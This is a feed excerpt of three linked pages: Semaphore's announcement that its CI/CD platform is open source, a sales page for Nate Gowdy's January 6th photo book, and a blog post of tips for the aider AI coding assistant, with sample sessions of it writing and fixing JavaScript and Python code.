    https://localthunk.com/blog/solitaire hacker-news-small-sites-43195516 Thu, 27 Feb 2025 15:54:36 GMT
    <![CDATA[Semaphore goes Open Source today]]> thread link) | @ezekg
    February 27, 2025 | https://semaphore.io/semaphore-goes-open-source-today | archive.org

    Today is a big day for us and, hopefully, for you too. We’re excited to announce that Semaphore’s core CI/CD platform is officially open source as of today. Now, you can explore, tweak, and contribute to the same production-grade code that’s powered your builds and deployments—all under the Apache 2.0 license.

    Find the GitHub repo here:

    We built Semaphore with real-world developers in mind. Over the years, many of you have faced the frustrations of opaque pipelines and vendor lock-in. By opening our code, we’re handing over the keys so you can better understand how everything works, fix issues, and even add new features.

    The open-source release brings you the same robust pipeline engine and workflow builder that handle millions of jobs every day. Semaphore is available in three flavors:

    • Semaphore Cloud for those who want a hassle-free, fully managed service
    • Semaphore Community Edition for anyone who loves to roll up their sleeves and dive into the code
    • Semaphore Enterprise for on-prem setups with additional enterprise features and support

    What’s next?

    • Contributions are open and very welcome; please read our contribution guide if you’re interested in participating.
    • Head over to the installation guide to learn how to install the Community Edition on your own hardware.

    We invite you to head over to our GitHub repository, join the conversation on Discord, and voice your ideas. Let’s build a better CI/CD ecosystem together — one commit at a time.

    Happy coding!

    ]]>
    https://semaphore.io/semaphore-goes-open-source-today hacker-news-small-sites-43195484 Thu, 27 Feb 2025 15:52:23 GMT
    <![CDATA[Insurrection – a physical photo journal of January 6th]]> thread link) | @gooseus
    February 27, 2025 | http://www.nategowdy.com/insurrection-book-orders/p/9x11-hardcover-edition | archive.org

    On January 20, 2017, photojournalist Nate Gowdy stood at the U.S. Capitol, incredulous, as Donald J. Trump—with right hand raised and left atop the Lincoln Bible—took the presidential oath of office, vowing to end “American carnage.”

    Four years later, on January 6, 2021, Gowdy returned to Washington, DC, prepared to document one last MAGA rally: the outgoing president’s “Save America” speech at the Ellipse. Instead, he found himself amidst right-wing extremists, fervently inscribing that day into the annals of history.

    The result is Gowdy’s debut monograph, INSURRECTION, where surreal scenes unfold: militants marching, kneeling in prayer, posing for group photos, breaking for hotdogs, rampaging against the Capitol’s sworn protectors, and leading thousands to defile the Inauguration Day stage.

    Twice assaulted for being deemed “fake news,” Gowdy persisted in exposing the truth. Shot on assignment for Rolling Stone, his stark, unflinching images depict the US Capitol, one of democracy’s most sacred symbols, as it becomes a haunting set piece in a dystopian tableau of domestic terror—an inside job.

    This 150-page hardcover stands as the sole book of photojournalism dedicated to one of the darkest days in modern American history. Its timestamped photographs and contextual captions chronicle one of democracy’s most rarified spaces, once reserved for solemn and dignified assembly, as it is overwhelmed with—you guessed it—American carnage.

    Foreworded by DC Metropolitan Police Officer Daniel Hodges, who risked his life defending the Capitol and was almost crushed to death, INSURRECTION captures a chilling chapter in American politics, spotlighting the fragility of a nation’s ideals.

    INSURRECTION
    Photographs, text & design by Nate Gowdy
    Foreword by Officer Daniel Hodges
    Introduction by Michael Rowe
    Edited by Lisa van Dam-Bates
    Printed and bound in the USA

    • 124 duotone plates
    • 150 pages
    • 9x11 Hardcover
    • Published by Pigeon Editions, January 2023
    • ISBN-13: 978-1-7354812-3-4
    • Print run of 500

    Available here and at select Seattle bookstores, such as Elliott Bay Book Company.
    Shipping on this site is USA only (contact nate.gowdy@gmail.com for exceptions).

    You will receive an email notification when yours ships the next business day!

    ABOUT THE AUTHOR

    Nate Gowdy (1984; Elkhart, Indiana) is a Seattle photographer of 14 years who documents this American political era.

    In 2011, Gowdy was hired as staff photographer at Seattle Gay News, where he became immersed in the city’s queer and trans communities, primarily capturing drag and nightlife culture. He served as the official photographer for the Seattle Pride Parade from 2011 through 2024. In 2012, Gowdy dedicated himself to covering the fight for marriage equality in Washington state.

    Gowdy worked closely with President Obama in 2013 and Vice President Biden in 2014 during their visits to Seattle. Since 2015, he has self-funded coverage of hundreds of political rallies and demonstrations across 27 states and Washington, DC. In 2016, his portrait of Bernie Sanders was featured on TIME magazine’s cover, and editorial clients include Rolling Stone and Mother Jones.

    In 2019, Gowdy, with a small core team, spearheaded The American Superhero project, a collaborative studio portrait and storytelling series. The following year, he photographed and co-authored Our Students, Their Stories for Seattle Public Schools. This 100-page coffee table book celebrates LGBTQIA+ students, families, and staff, marking the first project of its kind commissioned by an American school district.

    In 2023, Gowdy self-published his first monograph, INSURRECTION. This award-winning, 150-page hardcover is the sole book to visually chronicle—with timestamped images and contextual captions—the deadly mob attack on the U.S. Capitol on January 6, 2021. With over 1,250 copies sold, the hardcover remains available at www.nategowdy.com and Elliott Bay Book Co.

    A journalism graduate from Indiana University and a former newspaper editor, preschool caregiver, and community outreach worker, Gowdy maintains a photography studio in Seattle’s International District. His fine art is represented at Monroe Gallery of Photography in Santa Fe, New Mexico. Outside of work, he enjoys teaching, kayaking, biking, yoga, and spending time with loved ones.

    AWARDS & HONORS

    • PX3—The Prix de la Photographie Paris (2023: 1st Place, Book Photographer of the Year; Gold in Book, Documentary; Gold in Press/Political)
    • American Photography (Selected: 2023 [x4], 2022 [x2])
    • Communication Arts Photography Annual (Books, 2022; Editorial, 2021)
    • International Photography Awards (2022: 1st Place in Book, Self Published; 3rd Place in Editorial/Press, War/Conflict; Best of Show [Guest Curator, Dr. Mark Sealy])
    • Lucie Photo Book Prize (2022: Independent Category Finalist)
    • Society of Professional Journalists Western Washington’s 2022 Passion Project Grant
    • Philipson Foundation’s 2022 Public Documentation Grant

    WHAT PEOPLE ARE SAYING

    “Gowdy's pictures show how close we came to losing our democracy. His book reminds us that we cannot and must not look away and that the threats against our fragile republic are as present as ever. I encourage everyone to page through this courageous work with eyes wide open to the violence, hatred, and lies that have swept up our politics.”
    — Congresswoman Pramila Jayapal (D-WA)

    “INSURRECTION moves readers through the day in timestamped, chronological order, bringing them a firsthand, up-close account of not just the insurrection, but what it was like to be a journalist on the front lines of a battle for democracy.”
    — Mother Jones

    “First, I want to thank you for photographing what you do. Kudos. I think you are a first-rate journalist. As soon as the insurrection occurred, I started looking at images I felt portrayed the event the best—yours always came out on top.”
    — Will Michels, co-curator of WAR/PHOTOGRAPHY: Images of Armed Conflict and its Aftermath, The Museum of Fine Arts, Houston

    “Gowdy’s photos are a searing reminder of the threat our democracy faced on January 6, 2021. His courage in documenting the images of that fateful day in American history have also been key to ensuring that insurrectionists who incited and executed the attack on our nation’s Capitol are held accountable for their actions.”
    — Donald Sherman, Chief Counsel, Citizens for Responsibility and Ethics in Washington

    “The book looks amazing and is such an incredible document and reminder of a historically significant day. It’s wildly moving seeing it presented the way you have. Very well done.”
    — Griffin Lotz, Rolling Stone

    “Wow, Gowdy’s images from Jan. 6 are powerful. I can see why he sold out the first print run.”
    — Charles Whitaker, Dean of Northwestern’s Medill School of Journalism

    “Nate Gowdy's masterful monograph is photojournalism at its finest. As we are asked to reject the evidence of our eyes and memory hole January 6th, INSURRECTION shatters those fragile lies and shines the light of truth on those harrowing few hours. Haunting and beautiful, this photographic storytelling showcases a craftsman at the peak of his art.”
    — Andrew L. Seidel, author of The Founding Myth: Why Christian Nationalism is Un-American and American Crusade: How the Supreme Court Is Weaponizing Religious Freedom, and author of the seminal report Christian Nationalism and the January 6, 2021, Insurrection

    “Gowdy has an eye for identifying essential truths in a sea of noise. Our country will be reckoning with the fallout of January 6 for years to come, be it the injuries and traumas sustained, the criminal records acquired, or the weakening of our democratic institutions. Turn these pages. The best way to prevent this from happening again is to understand who brought this about. Guard against what they stand for, and thwart the ideologies they represent—in your neighbors and your families, and within yourself.”
    — Officer Daniel Hodges, DC Metropolitan Police Department, in his Foreword

    “The journalists who take risks to bring us the stories like the ones told here in this book would dismiss the notion that they are doing anything but their jobs. Most would be embarrassed to be called “heroes,” but none would ever countenance being called “the enemy of the people.” That’s an autocrat’s phrase, one usually wielded by politicians and power brokers for whom the real enemy is the truth—which is what journalism, and especially photojournalism, is, at its best. And INSURRECTION is photojournalism at its very best.”
    — Michael Rowe, award-winning novelist, in his Introduction

    “For what it’s worth, I’m staying with my mom right now, who cut her teeth protesting the Vietnam War. When she leered through this book, and these images, she immediately said, ‘This is like the photos the journalists sent home from Vietnam.’ This book is a damn important work of art.”
    — Reader review

    “The book is amazing—well-conceived and laid out with dramatic, evocative photos and ‘in the moment’ text blocks. The timestamps are genius, and, together with the photos, give the book a propulsive feel that keeps the reader engaged, flipping the pages, one after another. It deserves a higher profile, and I honestly feel it should be sent to every member of Congress.”
    — Reader review

    “I follow the news, on both sides, and have never had a better understanding of what actually happened that day, and who all was involved, than after seeing this book. And as a photographer, I’m inspired to up my game to capture so much story in singular moments in time. Absolutely stunning!”
    — Reader review

    “Hi Nate, we were visiting a family friend of yours last night and saw your photo journal of January 6th. As hard as it was to view, here I am in the middle of the night attempting to purchase the book. Huge congrats on the softcover first-edition being sold out. I hear you may have a hardcover version coming out, which means maybe we can still get a copy? Please let me know. It’s something I want my grandchildren to see, study, and know.”
    — Reader review

    PRESS

    March 2023 | Town Hall Seattle
    “Nate Gowdy — The Insurrection in photos”

    January 2023 | PetaPixel
    “Photojournalist releases intense images from the Jan 6 riot”

    January 2023 | Seize the Moment Podcast
    “Nate Gowdy — Storm of the Capitol: The Insurrection of January 6th”

    January 2023 | Seattle Gay News
    “Nate Gowdy captures history in the making in his new book, INSURRECTION”

    January 2023 | Forthright Radio
    “Nate Gowdy’s INSURRECTION”

    January 2023 | Nicole Sandler Show
    “No Insurrection whitewashing allowed here with Nate Gowdy”

    January 2023 | PBS NewsHour
    “The 'melee' of Jan. 6, through a photographer's lens”

    January 2023 | Mother Jones
    “INSURRECTION: January 6, up close and firsthand: A new photo book brings you face-to-face with the fight for the Capitol”

    January 2023 | Crosscut
    “A Seattle photographer's firsthand account of the Jan. 6 chaos”

    September 2022 | Post Alley | Seattle (originally for PublicDisplay.Art)
    “From Bernie Sanders to immigrant superheroes to January 6th, Seattle photographer Nate Gowdy chronicles the intimate and the dangerous of American Politics”

    January 2023 | Talk Louisiana
    “Photojournalist Nate Gowdy reflects on the January 6 insurrection on its two-year anniversary”

    January 2023 | Thom Hartmann Program
    “‘Jan 6th insurrectionists attacked me during coup attempt’”

    January 2023 | Charlotte Talks with Mike Collins
    “Reflections on the January 6th Capitol attack, two years later”

    December 2022 | Surreal News
    “Interview with photographer Nate Gowdy”

    July 2022 | KBCS.FM
    “INSURRECTION: A photo compilation from Jan 6, 2021”

    January 2021 | KING5
    “Seattle-based photographer Nate Gowdy recalls violent day at US Capitol”

    January 2021 | Malcontent News
    “Photographer Nate Gowdy reflects on Washington D.C. Insurrection”

    January 2021 | KBCS.FM
    “Behind the Lens at the nation's Capitol during an Insurrection”


    ]]>
    http://www.nategowdy.com/insurrection-book-orders/p/9x11-hardcover-edition hacker-news-small-sites-43195254 Thu, 27 Feb 2025 15:30:57 GMT
    <![CDATA[Vibe Coding with Aider: Tips and Tricks]]> thread link) | @bitforger
    February 27, 2025 | http://mitchgordon.me/tools/2025/02/26/aider.html | archive.org

    I started using aider last month as a way to get back in shape after a long leave from work. Eventually aider sped me up a lot, but I had to learn some new ways of approaching development. It was different from using Cursor in that you don’t really see the code until it’s being edited. This doc is a compilation of the notes I took as I worked on a few projects, which I think will be helpful to others using aider for the first time.

    Note: if you have seen Claude Code, aider has a very similar UX.

    First, turn on architect mode with /architect. This splits the model’s response into two phases: proposing changes and actually editing files. This improves model performance by giving it a chance to plan, while also giving you a chance to reject proposed changes and ask for revisions before touching any files.

    /architect
    
    
        > Aider v0.71.2.dev+less  
        > Main model: claude-3-5-sonnet-20241022 with architect edit format, infinite output  
        > Editor model: claude-3-5-sonnet-20241022 with editor-diff edit format  
        > Weak model: claude-3-5-haiku-20241022  
        > Git repo: .git with 13 files  
        > Repo-map: using 4096 tokens, auto refresh  
        > Added beat_sheet.py to the chat.  
        > Added chapters.py to the chat.  
        > Added characters.py to the chat.  
        > Added lm.py to the chat.  
        > Added location.py to the chat.  
        > Added main.py to the chat.  
        > Added pick.py to the chat.  
        > Added write.py to the chat.  


    Add the files you want to work on with /add. If you don’t know which, ask the model to list the files that need editing, or just add them all if there aren’t many. Drop fluff with /drop, which improves performance. If you’re new to the codebase and don’t want to make changes, /ask about the codebase.

    /ask we're breaking back into this project after almost a year. open the files you need to open and get me back up to speed on what's going on.
    
        From the file summaries, this appears to be a writing assistance tool, likely for romance novels. Let me break down what I can see:
        
        1. The core structure seems to be built around an `AppState` class in `main.py` that manages different states like:
           - MAIN_MENU
           - BEATS (for beat sheets/story structure)
           - CHAPTER
           - CHAPTER_SKETCH
           and others
        
        2. The project has several main components:
           - Beat sheets (story structure) management (`beat_sheet.py`)
           - Chapter and section handling (`chapters.py`)
           - Character management (`characters.py`)
           - Location management (`location.py`)
           - Language model integration (`lm.py`) - seems to use GPT-4 for assistance
           - Writing interface (`write.py`)
        
        3. It appears to be an interactive tool that helps authors:
           - Plan their story structure
           - Manage chapters and sections
           - Work with characters
           - Handle locations
           - Get AI assistance for various aspects of writing
        
        To give you a more detailed analysis of how it all works together, I'd need to see the full contents of at least:
        1. `main.py` - to understand the state management and overall flow
        2. One of the handler files (like `chapters.py` or `beat_sheet.py`) - to see how the interaction works
        
        Would you like me to look at any of those in detail?
        
    
    /add characters.py
    
        > Added characters.py to the chat  
        

    Get something running as soon as possible (UI or tests). Turn on watch mode for your framework (ask how to do this if you don’t know). Then ask for features or fixes (add a button, change the title, etc.). After every change, test whether things work or whether anything related broke.

    ok let's go ahead with the simplest MVP, starting with the data input UI.
    
    I'll propose a simple HTML/CSS/JS structure for the data input UI, starting with just vans and locations.
    
    Create this basic file structure:
    ```
    index.html
    styles.css
    app.js
    ```
    
    For index.html, start with:
    ```html
    <!DOCTYPE html>
    <html>
    <head>
        <title>Van Route Planner</title>
        <link rel="stylesheet" href="styles.css">
    </head>
    <body>
        <div class="container">
            <h1>Van Route Planner</h1>
            
            <section id="van-section">
                <h2>Vans</h2>
                <div id="van-list"></div>
                <button onclick="addVan()">Add Van</button>
            </section>
    
            <section id="location-section">
                <h2>Destinations</h2>
                <div id="location-list"></div>
                <button onclick="addLocation()">Add Location</button>
            </section>
    
            <button id="calculate" onclick="calculateRoutes()" disabled>Calculate Routes</button>
        </div>
        <script src="app.js"></script>
    </body>
    </html>
    ```
    
    For app.js, start with:
    ```javascript
    let vans = [];
    let locations = [];
    
    function addVan() {
        const van = {
            id: Date.now().toString(),
            seatCount: 6
        };
        vans.push(van);
        renderVans();
        updateCalculateButton();
    }
    
    function addLocation() {
        const location = {
            id: Date.now().toString(),
            name: '',
            passengerCount: 1
        };
        locations.push(location);
        renderLocations();
        updateCalculateButton();
    }
    
    function renderVans() {
        const vanList = document.getElementById('van-list');
        vanList.innerHTML = vans.map(van => `
            <div class="van-item">
                <label>Seats:
                    <select onchange="updateVanSeats('${van.id}', this.value)">
                        <option value="6" ${van.seatCount === 6 ? 'selected' : ''}>6</option>
                        <option value="7" ${van.seatCount === 7 ? 'selected' : ''}>7</option>
                    </select>
                </label>
                <button onclick="deleteVan('${van.id}')">Delete</button>
            </div>
        `).join('');
    }
    
    function renderLocations() {
        const locationList = document.getElementById('location-list');
        locationList.innerHTML = locations.map(location => `
            <div class="location-item">
                <input type="text" 
                       placeholder="Location name" 
                       value="${location.name}"
                       onchange="updateLocationName('${location.id}', this.value)">
                <input type="number" 
                       min="1" 
                       max="5" 
                       value="${location.passengerCount}"
                       onchange="updatePassengerCount('${location.id}', this.value)">
                <button onclick="deleteLocation('${location.id}')">Delete</button>
            </div>
        `).join('');
    }
    
    function updateVanSeats(id, seats) {
        const van = vans.find(v => v.id === id);
        if (van) van.seatCount = parseInt(seats);
    }
    
    function updateLocationName(id, name) {
        const location = locations.find(l => l.id === id);
        if (location) location.name = name;
    }
    
    function updatePassengerCount(id, count) {
        const location = locations.find(l => l.id === id);
        if (location) location.passengerCount = parseInt(count);
    }
    
    function deleteVan(id) {
        vans = vans.filter(v => v.id !== id);
        renderVans();
        updateCalculateButton();
    }
    
    function deleteLocation(id) {
        locations = locations.filter(l => l.id !== id);
        renderLocations();
        updateCalculateButton();
    }
    
    function updateCalculateButton() {
        const button = document.getElementById('calculate');
        button.disabled = vans.length === 0 || locations.length === 0;
    }
    
    function calculateRoutes() {
        // This will be implemented next
        console.log('Calculating routes for:', {vans, locations});
    }
    ```
    
    For styles.css, start with:
    ```css
    .container {
        max-width: 800px;
        margin: 0 auto;
        padding: 20px;
    }
    
    section {
        margin-bottom: 20px;
    }
    
    .van-item, .location-item {
        margin: 10px 0;
        padding: 10px;
        border: 1px solid #ccc;
        border-radius: 4px;
    }
    
    button {
        margin: 5px;
        padding: 5px 10px;
    }
    
    input, select {
        margin: 0 5px;
        padding: 3px;
    }
    
    #calculate {
        display: block;
        margin-top: 20px;
        padding: 10px 20px;
    }
    ```
    
    This gives you:
    1. Ability to add/remove vans and set their seat count (6 or 7)
    2. Ability to add/remove locations and set passenger counts (1-5)
    3. Basic validation (Calculate button enabled only when there's at least one van and location)
    4. Data stored in memory (we'll add localStorage persistence next)
    
    Would you like me to:
    1. Add localStorage persistence
    2. Start on the route calculation logic
    3. Enhance the UI with additional features
    4. Something else?
    
    > Tokens: 1.0k sent, 1.1k received. Cost: $0.02 message, $0.03 session.  
    > Edit the files? (Y)es/(N)o [Yes]: y  
    
    Let me create these initial files using *SEARCH/REPLACE blocks*:
    
    index.html
    ```html
    <<<<<<< SEARCH
    =======
    <!DOCTYPE html>
    <html>
    <head>
        <title>Van Route Planner</title>
        <link rel="stylesheet" href="styles.css">
    </head>
    <body>
        <div class="container">
            <h1>Van Route Planner</h1>
            
            <section id="van-section">
                <h2>Vans</h2>
                <div id="van-list"></div>
                <button onclick="addVan()">Add Van</button>
            </section>
    
            <section id="location-section">
                <h2>Destinations</h2>
                <div id="location-list"></div>
                <button onclick="addLocation()">Add Location</button>
            </section>
    
            <button id="calculate" onclick="calculateRoutes()" disabled>Calculate Routes</button>
        </div>
        <script src="app.js"></script>
    </body>
    </html>
    >>>>>>> REPLACE
    ```
    
    styles.css
    ```css
    <<<<<<< SEARCH
    =======
    .container {
        max-width: 800px;
        margin: 0 auto;
        padding: 20px;
    }
    
    section {
        margin-bottom: 20px;
    }
    
    .van-item, .location-item {
        margin: 10px 0;
        padding: 10px;
        border: 1px solid #ccc;
        border-radius: 4px;
    }
    
    button {
        margin: 5px;
        padding: 5px 10px;
    }
    
    input, select {
        margin: 0 5px;
        padding: 3px;
    }
    
    #calculate {
        display: block;
        margin-top: 20px;
        padding: 10px 20px;
    }
    >>>>>>> REPLACE
    ```
    
    app.js
    ```javascript
    <<<<<<< SEARCH
    =======
    let vans = [];
    let locations = [];
    
    function addVan() {
        const van = {
            id: Date.now().toString(),
            seatCount: 6
        };
        vans.push(van);
        renderVans();
        updateCalculateButton();
    }
    
    function addLocation() {
        const location = {
            id: Date.now().toString(),
            name: '',
            passengerCount: 1
        };
        locations.push(location);
        renderLocations();
        updateCalculateButton();
    }
    
    function renderVans() {
        const vanList = document.getElementById('van-list');
        vanList.innerHTML = vans.map(van => `
            <div class="van-item">
                <label>Seats:
                    <select onchange="updateVanSeats('${van.id}', this.value)">
                        <option value="6" ${van.seatCount === 6 ? 'selected' : ''}>6</option>
                        <option value="7" ${van.seatCount === 7 ? 'selected' : ''}>7</option>
                    </select>
                </label>
                <button onclick="deleteVan('${van.id}')">Delete</button>
            </div>
        `).join('');
    }
    
    function renderLocations() {
        const locationList = document.getElementById('location-list');
        locationList.innerHTML = locations.map(location => `
            <div class="location-item">
                <input type="text" 
                       placeholder="Location name" 
                       value="${location.name}"
                       onchange="updateLocationName('${location.id}', this.value)">
                <input type="number" 
                       min="1" 
                       max="5" 
                       value="${location.passengerCount}"
                       onchange="updatePassengerCount('${location.id}', this.value)">
                <button onclick="deleteLocation('${location.id}')">Delete</button>
            </div>
        `).join('');
    }
    
    function updateVanSeats(id, seats) {
        const van = vans.find(v => v.id === id);
        if (van) van.seatCount = parseInt(seats);
    }
    
    function updateLocationName(id, name) {
        const location = locations.find(l => l.id === id);
        if (location) location.name = name;
    }
    
    function updatePassengerCount(id, count) {
        const location = locations.find(l => l.id === id);
        if (location) location.passengerCount = parseInt(count);
    }
    
    function deleteVan(id) {
        vans = vans.filter(v => v.id !== id);
        renderVans();
        updateCalculateButton();
    }
    
    function deleteLocation(id) {
        locations = locations.filter(l => l.id !== id);
        renderLocations();
        updateCalculateButton();
    }
    
    function updateCalculateButton() {
        const button = document.getElementById('calculate');
        button.disabled = vans.length === 0 || locations.length === 0;
    }
    
    function calculateRoutes() {
        // This will be implemented next
        console.log('Calculating routes for:', {vans, locations});
    }
    >>>>>>> REPLACE
    ```
    
    > Tokens: 2.7k sent, 993 received. Cost: $0.02 message, $0.06 session.  
    > index.html  
    > Create new file? (Y)es/(N)o [Yes]: y  
    > styles.css  
    > Create new file? (Y)es/(N)o [Yes]: y  
    > app.js  
    > Create new file? (Y)es/(N)o [Yes]: y  
    > Applied edit to app.js  
    > Applied edit to index.html  
    > Applied edit to styles.css  
    > Commit 85ddd01 feat: Create initial HTML/CSS/JS structure for van route planner UI  
    
    /ask how do i run this project with watch mode enabled?
    
        
        Looking at the file structure, this appears to be a full-stack JavaScript/Node.js project with a React client. To run it in watch mode, you'll likely need to:
        
         1 Start the client (React app) in watch mode:
        
         cd client
         npm start
        
         2 Start the server in watch mode (in a separate terminal):
        
         # From the root directory
         npm run dev
        
        However, to give you the exact commands, I'd need to see the contents of:
        
         • root package.json
         • client/package.json
        
        Could you please add them to the chat?
        
        Tokens: 2.4k sent, 130 received. Cost: $0.0091 message, $0.0091 session.
        
        client/package.json
        Add file to the chat? (Y)es/(N)o/(A)ll/(S)kip all/(D)on't ask again [Yes]: Yes
        
        package.json
        Add file to the chat? (Y)es/(N)o/(A)ll/(S)kip all/(D)on't ask again [Yes]:
        Thanks! Looking at the package.json files you shared, you can run the project in watch mode using:
        
         npm run dev
        
        This command (defined in the root package.json) will use concurrently to run both:
        
         • The server with nodemon (npm run server)
         • The client with React's dev server (npm run client)
        
        This will:
        
         • Start the backend server on port 3001 (since the client's proxy is set to http://localhost:3001)
         • Start the React development server (typically on port 3000)
         • Watch for changes in both client and server code
         • Auto-reload when changes are detected
        
        Make sure to first install dependencies in both directories:
        
         npm install        # in root directory
         cd client
         npm install        # in client directory
        
        Then you can run npm run dev from the root directory to start everything in watch mode.
        
        Tokens: 3.2k sent, 192 received. Cost: $0.01 message, $0.02 session.
        
    
    make the chat box send on the Enter key press
    
        To make the chat box send on the Enter key press, we need to modify the `ChessGame.jsx` file. Here's the change:
        
        client/src/ChessGame.jsx
        ```javascript
        <<<<<<< SEARCH
                    
                      <Input
                        value={currentMessage}
                        onChange={(e) => setCurrentMessage(e.target.value)}
                        placeholder="Type a command (e.g., @PawnE2, move forward)"
                      />
                      <Button onClick={handleSendMessage}>Send</Button>
                    
        =======
                    
                      <Input
                        value={currentMessage}
                        onChange={(e) => setCurrentMessage(e.target.value)}
                        onKeyPress={(e) => {
                          if (e.key === 'Enter') {
                            handleSendMessage();
                          }
                        }}
                        placeholder="Type a command (e.g., @PawnE2, move forward)"
                      />
                      <Button onClick={handleSendMessage}>Send</Button>
                    
        >>>>>>> REPLACE
        ```
        
        This change adds an `onKeyPress` event handler to the `Input` component. When the 'Enter' key is pressed, it will trigger the `handleSendMessage` function, just like clicking the "Send" button does.
        
        Now users can send messages by either clicking the "Send" button or pressing the Enter key while the input field is focused.
        
        > Tokens: 8.6k sent, 273 received. Cost: $0.03 message, $0.34 session.  
        > Applied edit to client/src/ChessGame.jsx  
        > Commit 166acdf feat: add Enter key press to send chat message  
        > You can use /undo to undo and discard each aider commit.  
        
    
    the POSSIBILITIES in location is returning an empty string when using the new command.
    
        Let's debug the location command handling. The issue is likely in the `LocationCommandHandler.handle_command` method where we're generating and displaying possibilities. Let's fix it:
        
        ```python
        # In command_handlers.py
        
        class LocationCommandHandler(StateCommandHandler):
            async def handle_command(self, command: str, state) -> bool:
                if command == 'rewrite':
                    # Add error handling and logging
                    print("Generating location possibilities...")
                    places = await lm.single_prompt(
                        f'What are some romance locations that might occur in a romance novel set in {state.location.general}, {state.location.specific}?', 
                        postprocess=lm.markdown_to_list
                    )
                    
                    if not places:
                        print("Error: No locations generated")
                        return False
                        
                    print('\nPOSSIBILITIES:')
                    print("\n\n".join([f'{idx+1}. {place}' for idx, place in enumerate(places)]))
        
                    subc = input('(pick) > ')
                    if subc == 'rand':
                        state.location.place = random.choice(places)
                    else:
                        try:
                            state.location.place = places[int(subc) - 1]
                        except (ValueError, IndexError):
                            print("Invalid selection")
                            return False
                    state.location.other_places = []
                    return True
        
                elif command == 'new':
                    state.location.general = random.choice(list(locations.keys()))
                    state.location.specific = random.choice(locations[state.location.general])
                    print(f"\nSelected: {state.location.general} - {state.location.specific}")
                    return await self.handle_command('rewrite', state)  # Call rewrite directly instead of recursively calling handle_location_command
                    
                elif command in ('others', 'other'):
                    state.state = "OTHER_PLACES"
                    return True
                    
                return False
        ```
        
        The key changes are:
        1. Added error handling for empty responses
        2. Fixed the 'new' command to properly chain to 'rewrite'
        3. Added more logging/feedback
        4. Made sure we're using the correct state attributes
        
        Let me know if you're still seeing issues with the location possibilities generation.
        
        > Tokens: 19k sent, 439 received. Cost: $0.06 message, $2.40 session.  
        > Edit the files? (Y)es/(N)o [Yes]: y  
        
        Here's the proper SEARCH/REPLACE block for the changes:
        
        command_handlers.py
        ```python
        <<<<<<< SEARCH
            async def handle_command(self, command: str, state) -> bool:
                if command == 'rewrite':
                    places = await lm.single_prompt(f'What are some romance locations that might occur in a romance novel set in {state.location.general}, {state.location.specific}?', postprocess=lm.markdown_to_list)
                    print('POSSIBILITIES:')
                    print("\n\n".join([f'{idx+1}. {place}' for idx, place in enumerate(places)]))
        
                    subc = input('(pick) > ')
                    if subc == 'rand':
                        state.location.place = random.choice(places)
                    else:
                        state.location.place = places[int(subc) - 1]
                    state.location.other_places = []
                    return True
                elif command == 'new':
                    state.location.general = random.choice(list(locations.keys()))
                    state.location.specific = random.choice(locations[state.location.general])
                    print(state.location.general)
                    print(state.location.specific)
                    await self.handle_command('rewrite', state)
                    return True
                elif command in ('others', 'other'):
                    state.state = "OTHER_PLACES"
                    return True
        =======
            async def handle_command(self, command: str, state) -> bool:
                if command == 'rewrite':
                    # Add error handling and logging
                    print("Generating location possibilities...")
                    places = await lm.single_prompt(
                        f'What are some romance locations that might occur in a romance novel set in {state.location.general}, {state.location.specific}?', 
                        postprocess=lm.markdown_to_list
                    )
                    
                    if not places:
                        print("Error: No locations generated")
                        return False
                        
                    print('\nPOSSIBILITIES:')
                    print("\n\n".join([f'{idx+1}. {place}' for idx, place in enumerate(places)]))
        
                    subc = input('(pick) > ')
                    if subc == 'rand':
                        state.location.place = random.choice(places)
                    else:
                        try:
                            state.location.place = places[int(subc) - 1]
                        except (ValueError, IndexError):
                            print("Invalid selection")
                            return False
                    state.location.other_places = []
                    return True
        
                elif command == 'new':
                    state.location.general = random.choice(list(locations.keys()))
                    state.location.specific = random.choice(locations[state.location.general])
                    print(f"\nSelected: {state.location.general} - {state.location.specific}")
                    return await self.handle_command('rewrite', state)
                    
                elif command in ('others', 'other'):
                    state.state = "OTHER_PLACES"
                    return True
        >>>>>>> REPLACE
        ```
        > Tokens: 15k sent, 571 received. Cost: $0.05 message, $2.50 session.  
        > Applied edit to command_handlers.py  
        > Commit 0e432dd refactor: Improve error handling and logging in location command handler  
        > You can use /undo to undo and discard each aider commit.  
        
    

    As a traditional dev I’m used to each commit being a working copy of the repo. But aider makes a commit for every request, which means most of your commits will be broken. That’s OK. Keep iterating, and use /git tag to mark working commits instead. Use semantic versioning to signal how big a change each version represents, and review your changes with /git log.
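
    A plain-git sketch of that workflow (minimal; the tag names here just follow the sequence shown below):

    ```bash
    # Mark the current commit as a known-good state
    git tag v0.3.5

    # Find the most recent working tag when something breaks
    git describe --tags --abbrev=0

    # Review everything that changed since the last good tag
    git diff v0.3.4..HEAD --stat
    ```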

    /git tag
    
        v0.1
        v0.1.1
        v0.2
        v0.2.1
        v0.3
        v0.3.1
        v0.3.2
        v0.3.3
        v0.3.4
        
    
    /git tag v0.3.5
    
    
    /git log --decorate -n 5
    
        commit 5f08ffd9a0e6088ef20dd516c01fedd7129dd908 (HEAD -> main)
        Author: Mitchell Gordon (aider) <mitchell.gordon95@gmail.com>
        Date:   Tue Jan 21 17:50:26 2025 -0500
        
            refactor: Remove duplicate routes declaration and improve debug logging
        
        commit c79ff0c7e5fa9fc21b1bcc8e5029ae86d255e50f
        Author: Mitchell Gordon (aider) <mitchell.gordon95@gmail.com>
        Date:   Tue Jan 21 17:49:50 2025 -0500
        
            refactor: Enhance route calculation with state reset and debug logging
        
        commit d5c0925289ad30ae537c2535ead64bef350d57cf
        Author: Mitchell Gordon (aider) <mitchell.gordon95@gmail.com>
        Date:   Tue Jan 21 17:47:12 2025 -0500
        
            refactor: Reset van assignments and trip status during route initialization
        
        commit 9dd130c685bb4f00494b4fdcec37a3f27c5557b8 (tag: v1.2.0)
        Author: Mitchell Gordon (aider) <mitchell.gordon95@gmail.com>
        Date:   Tue Jan 21 17:38:00 2025 -0500
        
            feat: Enhance depot and location input selection validation
        
        commit 8e05d5285e58785e2a586bfcee1af232e96c198a
        Author: Mitchell Gordon (aider) <mitchell.gordon95@gmail.com>
        Date:   Tue Jan 21 17:34:27 2025 -0500
        
            feat: Add Clear Data button with localStorage reset functionality
        
    

    If there’s an obvious error message, copy and paste the error into aider. If there’s no error message but something is still broken, ask for copious logs to narrow down where the problem is. This is essentially free to do, so do it often. Copy the logs into aider, ideally with a note about what issue they indicate.

    Uncaught SyntaxError: Identifier 'routes' has already been declared (at app.js:422:9)
    
        Ah, I see the issue. We have two declarations of `routes` in the `calculateRoutes` function. Let's fix that by removing the second declaration. Here's the fix for `app.js`:
        
